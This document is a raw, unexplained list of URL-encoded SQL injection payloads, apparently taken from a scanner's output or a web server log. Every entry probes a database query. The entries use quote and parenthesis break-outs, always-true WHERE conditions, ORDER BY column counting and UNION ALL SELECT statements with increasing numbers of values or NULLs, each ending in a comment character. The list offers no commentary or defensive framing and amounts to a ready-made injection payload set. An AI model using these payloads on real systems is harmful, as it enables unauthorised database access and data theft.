-5125%27%29%20WHERE%202974%3D2974%20UNION%20ALL%20SELECT%202974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%23 -2652%22%29%20WHERE%203071%3D3071%20ORDER%20BY%201%23 -6477%22%29%20WHERE%206866%3D6866%20ORDER%20BY%204110%23 -5507%22%29%20WHERE%203178%3D3178%20UNION%20ALL%20SELECT%203178%23 -9479%22%29%20WHERE%202492%3D2492%20UNION%20ALL%20SELECT%202492%2C2492%23 -4840%22%29%20WHERE%201024%3D1024%20UNION%20ALL%20SELECT%201024%2C1024%2C1024%23 -8665%22%29%20WHERE%207469%3D7469%20UNION%20ALL%20SELECT%207469%2C7469%2C7469%2C7469%23 -5692%22%29%20WHERE%201480%3D1480%20UNION%20ALL%20SELECT%201480%2C1480%2C1480%2C1480%2C1480%23 -8136%22%29%20WHERE%202000%3D2000%20UNION%20ALL%20SELECT%202000%2C2000%2C2000%2C2000%2C2000%2C2000%23 -2687%22%29%20WHERE%208668%3D8668%20UNION%20ALL%20SELECT%208668%2C8668%2C8668%2C8668%2C8668%2C8668%2C8668%23 -6935%22%29%20WHERE%204413%3D4413%20UNION%20ALL%20SELECT%204413%2C4413%2C4413%2C4413%2C4413%2C4413%2C4413%2C4413%23 -2813%22%29%20WHERE%203329%3D3329%20UNION%20ALL%20SELECT%203329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%23 -7299%22%29%20WHERE%207483%3D7483%20UNION%20ALL%20SELECT%207483%2C7483%2C7483%2C7483%2C7483%2C7483%2C7483%2C7483%2C7483%2C7483%23 -9866%27%20WHERE%207499%3D7499%20ORDER%20BY%201%23 -6108%27%20WHERE%206778%3D6778%20ORDER%20BY%206879%23 -8869%27%20WHERE%205424%3D5424%20UNION%20ALL%20SELECT%205424%23 -3481%27%20WHERE%205809%3D5809%20UNION%20ALL%20SELECT%205809%2C5809%23 -2646%27%20WHERE%201769%3D1769%20UNION%20ALL%20SELECT%201769%2C1769%2C1769%23 -2913%27%20WHERE%209647%3D9647%20UNION%20ALL%20SELECT%209647%2C9647%2C9647%2C9647%23 -4042%27%20WHERE%205948%3D5948%20UNION%20ALL%20SELECT%205948%2C5948%2C5948%2C5948%2C5948%23 -1831%27%20WHERE%203566%3D3566%20UNION%20ALL%20SELECT%203566%2C3566%2C3566%2C3566%2C3566%2C3566%23 -1722%27%20WHERE%201826%3D1826%20UNION%20ALL%20SELECT%201826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%23 -3556%27%20WHERE%202312%3D2312%20UNION%20ALL%20SELECT%202312%2C2312%2C2312%2C2312%2C2312%2C2312%2C2312%2C2312%23 -8221%27%20WHERE%207784%3D7784%20UNION%20ALL%20SELECT%207784%2C7784%2C7784%2C7784%2C7784%2C7784%2C7784%2C7784%2C7784%23 -1255%27%20WHERE%209325%3D9325%20UNION%20ALL%20SELECT%209325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%23 -5545%22%20WHERE%203408%3D3408%20ORDER%20BY%201%23 -4158%22%20WHERE%203578%3D3578%20ORDER%20BY%201937%23 -5047%22%20WHERE%206650%3D6650%20UNION%20ALL%20SELECT%206650%23 -1313%22%20WHERE%205224%3D5224%20UNION%20ALL%20SELECT%205224%2C5224%23 -2165%22%20WHERE%201598%3D1598%20UNION%20ALL%20SELECT%201598%2C1598%2C1598%23 -9501%22%20WHERE%207807%3D7807%20UNION%20ALL%20SELECT%207807%2C7807%2C7807%2C7807%23 -6568%22%20WHERE%201801%3D1801%20UNION%20ALL%20SELECT%201801%2C1801%2C1801%2C1801%2C1801%23 -1428%22%20WHERE%205344%3D5344%20UNION%20ALL%20SELECT%205344%2C5344%2C5344%2C5344%2C5344%2C5344%23 -3173%22%20WHERE%204803%3D4803%20UNION%20ALL%20SELECT%204803%2C4803%2C4803%2C4803%2C4803%2C4803%2C4803%23 -1838%22%20WHERE%204760%3D4760%20UNION%20ALL%20SELECT%204760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%23 -4100%22%20WHERE%209118%3D9118%20UNION%20ALL%20SELECT%209118%2C9118%2C9118%2C9118%2C9118%2C9118%2C9118%2C9118%2C9118%23 -1412%22%20WHERE%204036%3D4036%20UNION%20ALL%20SELECT%204036%2C4036%2C4036%2C4036%2C4036%2C4036%2C4036%2C4036%2C4036%2C4036%23 -2886%27%7C%7C%28SELECT%20%27HCkK%27%20FROM%20DUAL%20WHERE%202234%3D2234%20ORDER%20BY%201%23 -5022%27%7C%7C%28SELECT%20%27ZUtA%27%20FROM%20DUAL%20WHERE%209235%3D9235%20ORDER%20BY%207329%23 -8329%27%7C%7C%28SELECT%20%27uHxI%27%20FROM%20DUAL%20WHERE%204738%3D4738%20UNION%20ALL%20SELECT%204738%23 -3594%27%7C%7C%28SELECT%20%27vZrl%27%20FROM%20DUAL%20WHERE%207858%3D7858%20UNION%20ALL%20SELECT%207858%2C7858%23 -8756%27%7C%7C%28SELECT%20%27zRNk%27%20FROM%20DUAL%20WHERE%202819%3D2819%20UNION%20ALL%20SELECT%202819%2C2819%2C2819%23 -3004%27%7C%7C%28SELECT%20%27yFnd%27%20FROM%20DUAL%20WHERE%203543%3D3543%20UNION%20ALL%20SELECT%203543%2C3543%2C3543%2C3543%23 -8984%27%7C%7C%28SELECT%20%27cDYr%27%20FROM%20DUAL%20WHERE%202416%3D2416%20UNION%20ALL%20SELECT%202416%2C2416%2C2416%2C2416%2C2416%23 -3262%27%7C%7C%28SELECT%20%27zEXi%27%20FROM%20DUAL%20WHERE%207949%3D7949%20UNION%20ALL%20SELECT%207949%2C7949%2C7949%2C7949%2C7949%2C7949%23 -8760%27%7C%7C%28SELECT%20%27eVVi%27%20FROM%20DUAL%20WHERE%203422%3D3422%20UNION%20ALL%20SELECT%203422%2C3422%2C3422%2C3422%2C3422%2C3422%2C3422%23 -1130%27%7C%7C%28SELECT%20%27pExG%27%20FROM%20DUAL%20WHERE%203988%3D3988%20UNION%20ALL%20SELECT%203988%2C3988%2C3988%2C3988%2C3988%2C3988%2C3988%2C3988%23 -4964%27%7C%7C%28SELECT%20%27DpLZ%27%20FROM%20DUAL%20WHERE%203430%3D3430%20UNION%20ALL%20SELECT%203430%2C3430%2C3430%2C3430%2C3430%2C3430%2C3430%2C3430%2C3430%23 -9765%27%7C%7C%28SELECT%20%27qffu%27%20FROM%20DUAL%20WHERE%204620%3D4620%20UNION%20ALL%20SELECT%204620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%23 -5218%27%7C%7C%28SELECT%20%27JVdH%27%20WHERE%208221%3D8221%20ORDER%20BY%201%23 -4486%27%7C%7C%28SELECT%20%27BlrE%27%20WHERE%202075%3D2075%20ORDER%20BY%207178%23 -2248%27%7C%7C%28SELECT%20%27gMZO%27%20WHERE%203818%3D3818%20UNION%20ALL%20SELECT%203818%23 -1228%27%7C%7C%28SELECT%20%27PbAM%27%20WHERE%203452%3D3452%20UNION%20ALL%20SELECT%203452%2C3452%23 -4891%27%7C%7C%28SELECT%20%27aOfb%27%20WHERE%204805%3D4805%20UNION%20ALL%20SELECT%204805%2C4805%2C4805%23 -5112%27%7C%7C%28SELECT%20%27NoIO%27%20WHERE%203806%3D3806%20UNION%20ALL%20SELECT%203806%2C3806%2C3806%2C3806%23 -1225%27%7C%7C%28SELECT%20%27Tzvu%27%20WHERE%204916%3D4916%20UNION%20ALL%20SELECT%204916%2C4916%2C4916%2C4916%2C4916%23 -6068%27%7C%7C%28SELECT%20%27FHOO%27%20WHERE%206822%3D6822%20UNION%20ALL%20SELECT%206822%2C6822%2C6822%2C6822%2C6822%2C6822%23 -2900%27%7C%7C%28SELECT%20%27WkEi%27%20WHERE%202601%3D2601%20UNION%20ALL%20SELECT%202601%2C2601%2C2601%2C2601%2C2601%2C2601%2C2601%23 -3270%27%7C%7C%28SELECT%20%27Vnrc%27%20WHERE%203378%3D3378%20UNION%20ALL%20SELECT%203378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%23 -3421%27%7C%7C%28SELECT%20%27yrAe%27%20WHERE%207900%3D7900%20UNION%20ALL%20SELECT%207900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%23 -5559%27%7C%7C%28SELECT%20%27Opwx%27%20WHERE%203432%3D3432%20UNION%20ALL%20SELECT%203432%2C3432%2C3432%2C3432%2C3432%2C3432%2C3432%2C3432%2C3432%2C3432%23 -8211%27%2B%28SELECT%20MrYz%20WHERE%204844%3D4844%20ORDER%20BY%201%23 -1068%27%2B%28SELECT%20olJr%20WHERE%203806%3D3806%20ORDER%20BY%203842%23 -1187%27%2B%28SELECT%20MXTv%20WHERE%204633%3D4633%20UNION%20ALL%20SELECT%204633%23 -9770%27%2B%28SELECT%20Ooos%20WHERE%206201%3D6201%20UNION%20ALL%20SELECT%206201%2C6201%23 -1040%27%2B%28SELECT%20MvCF%20WHERE%208498%3D8498%20UNION%20ALL%20SELECT%208498%2C8498%2C8498%23 -5377%27%2B%28SELECT%20TMyV%20WHERE%207113%3D7113%20UNION%20ALL%20SELECT%207113%2C7113%2C7113%2C7113%23 -2970%27%2B%28SELECT%20zkgn%20WHERE%201948%3D1948%20UNION%20ALL%20SELECT%201948%2C1948%2C1948%2C1948%2C1948%23 -3345%27%2B%28SELECT%20jjTe%20WHERE%204235%3D4235%20UNION%20ALL%20SELECT%204235%2C4235%2C4235%2C4235%2C4235%2C4235%23 -8624%27%2B%28SELECT%20OeQO%20WHERE%206326%3D6326%20UNION%20ALL%20SELECT%206326%2C6326%2C6326%2C6326%2C6326%2C6326%2C6326%23 -4396%27%2B%28SELECT%20qBLM%20WHERE%207679%3D7679%20UNION%20ALL%20SELECT%207679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%23 -8858%27%2B%28SELECT%20hYvG%20WHERE%205331%3D5331%20UNION%20ALL%20SELECT%205331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%23 -2243%27%2B%28SELECT%20OAsJ%20WHERE%207867%3D7867%20UNION%20ALL%20SELECT%207867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%23 -8949%27%2B%28SELECT%20%27HKHR%27%20WHERE%208361%3D8361%20ORDER%20BY%201%23 -9253%27%2B%28SELECT%20%27oUFn%27%20WHERE%207719%3D7719%20ORDER%20BY%204068%23 -2785%27%2B%28SELECT%20%27Xfnk%27%20WHERE%202570%3D2570%20UNION%20ALL%20SELECT%202570%23 -5442%27%2B%28SELECT%20%27hmUT%27%20WHERE%204350%3D4350%20UNION%20ALL%20SELECT%204350%2C4350%23 -5810%27%2B%28SELECT%20%27lwaY%27%20WHERE%207249%3D7249%20UNION%20ALL%20SELECT%207249%2C7249%2C7249%23 -6755%27%2B%28SELECT%20%27MYam%27%20WHERE%201963%3D1963%20UNION%20ALL%20SELECT%201963%2C1963%2C1963%2C1963%23 -1599%27%2B%28SELECT%20%27SMCc%27%20WHERE%202924%3D2924%20UNION%20ALL%20SELECT%202924%2C2924%2C2924%2C2924%2C2924%23 -6775%27%2B%28SELECT%20%27MEAD%27%20WHERE%203226%3D3226%20UNION%20ALL%20SELECT%203226%2C3226%2C3226%2C3226%2C3226%2C3226%23 -8930%27%2B%28SELECT%20%27SUpy%27%20WHERE%207369%3D7369%20UNION%20ALL%20SELECT%207369%2C7369%2C7369%2C7369%2C7369%2C7369%2C7369%23 -1781%27%2B%28SELECT%20%27Athg%27%20WHERE%206263%3D6263%20UNION%20ALL%20SELECT%206263%2C6263%2C6263%2C6263%2C6263%2C6263%2C6263%2C6263%23 -2301%27%2B%28SELECT%20%27WUxV%27%20WHERE%204545%3D4545%20UNION%20ALL%20SELECT%204545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%23 -3153%27%2B%28SELECT%20%27nWLA%27%20WHERE%203463%3D3463%20UNION%20ALL%20SELECT%203463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%23 -1987%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%201%23 -2062%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%209323%23 -4025%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206405%23 -6192%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203869%2C3869%23 -5132%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203024%2C3024%2C3024%23 -1622%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208320%2C8320%2C8320%2C8320%23 -3982%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205723%2C5723%2C5723%2C5723%2C5723%23 -3367%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208265%2C8265%2C8265%2C8265%2C8265%2C8265%23 -8940%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202932%2C2932%2C2932%2C2932%2C2932%2C2932%2C2932%23 -3434%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%23 -6469%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209570%2C9570%2C9570%2C9570%2C9570%2C9570%2C9570%2C9570%2C9570%23 -5191%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207869%2C7869%2C7869%2C7869%2C7869%2C7869%2C7869%2C7869%2C7869%2C7869%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%208250%3D8250%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%201597%3D1597%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%208737%3D8737%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%209529%3D9529%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%204588%3D4588%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%203099%3D3099%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%203415%3D3415%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%206479%3D6479%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%203020%3D3020%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%203611%3D3611%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%201614%3D1614%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%208365%3D8365%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%201806%3D1806%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%204796%3D4796%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%202446%3D2446%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%202323%3D2323%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%209538%3D9538%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%206742%3D6742%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 